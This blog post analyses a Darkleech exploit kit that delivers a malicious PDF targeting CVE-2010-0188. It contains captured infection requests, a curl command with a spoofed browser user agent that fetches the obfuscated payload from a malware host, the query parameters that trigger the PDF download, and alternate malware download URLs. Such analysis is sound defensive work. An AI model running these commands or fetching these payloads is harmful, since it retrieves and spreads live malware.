Hello again, loyal readers!
I have a treat for you. I encountered an exploit kit while doing my malware thing and decided to try to get a better idea of what is going on start to finish.
I watched a machine get exploited and fired up Wireshark to watch:
GET http://220.127.116.11/2b01554de28f018745855a41166494db/lately-duplicate.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, (value not set), pronto/1.00.00, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; .NET CLR 1.1.4322; InfoPath.1; MS-RTC LM 8)
http://18.104.22.168/2b01554de28f018745855a41166494db/lately-duplicate.php is the infection URL
The first thing you notice is that if you try to visit the page with wget, lynx or curl, you get nothing:
joe@gironsec:~$ curl http://22.214.171.124/2b01554de28f018745855a41166494db/lately-duplicate.php
If you're clever, though, you'll set the User-Agent string to something like, oh, I don't know, IE 5 and hope for the best:
joe@gironsec:~$ curl --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" http://126.96.36.199/2b01554de28f018745855a41166494db/lately-duplicate.php | less
This returns a JavaScript file.
Here is the file:
Oh shoot, it's obfuscated. But fear not, we can unpack this easily. How?
Just replace the eval function with document.write! Do it in a throwaway VM, though: document.write renders whatever it is given, so if the next stage is HTML with a <script> tag it will run instead of being displayed. Dumping the string into a textarea or an alert() avoids that.
Here it is prettified: darkleech_decrypted
The code is a plugin detector that checks the browser for a PDF reader plugin.
What stood out for me was the following:
breeding-lecture.php?oocSsS=2j2e542g53&VMTIP=k&wuabRuEXEygOen=2g55562e312f2j2j3155&bHXKmoLg=2d2b2d2b2d2b2d
These are GET query-string parameters. The values look like hex pairs but contain letters past f (2j, 2g), so they are a custom encoding the server side decodes rather than plain hex.
When I curled the site with these values, it sent me a file:
darkleech_pdf. Since I was being flagged by VirusTotal / WebSense, I've password-protected the PDF file. The password is 'gironsec'.
The PDF file (which I didn't open, and neither should you) contained several FlateDecode streams.
A FlateDecode stream is a PDF stream object whose body is zlib (deflate) compressed, which is also how exploit PDFs keep their JavaScript and shellcode out of sight of a naive strings run. I assumed this was the payload:
41 0 obj<>stream
This one was more interesting to decode.
Broken down, the function concatenates string fragments to form hex characters.
To decode it, we do:
The following HTML file decodes it:
It is here:
Surprise, it's encoded again!
The shellcode, which is trying not to look like shellcode, is here:
(I just did a binary paste into OllyDbg and disassembled it.)
That was a crapload of work just to deliver an exploit. Not only that, I think I failed to disassemble / decrypt the final stage properly. I swear, the black hats are winning the war. They have more time on their hands.
All files here:
The password is 'lolwut'.
The PDF exploit is trying to take advantage of CVE-2010-0188, the libtiff overflow in Adobe Reader and Acrobat (fixed in 9.3.1 and 8.2.1) that is triggered by a malformed TIFF image embedded in the PDF.
Alternate malware download URIs in case they took the main one down:
GET http://188.8.131.52/c032df642295f9d35dee58bb00fd75cd/paintings-jumping.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-au
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2; MS-RTC LM 8; .NET CLR 3.0.4
GET http://184.108.40.206/aa8b7a06fcf440a2dbc0981a2b8837c8/pointer-exhibits.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;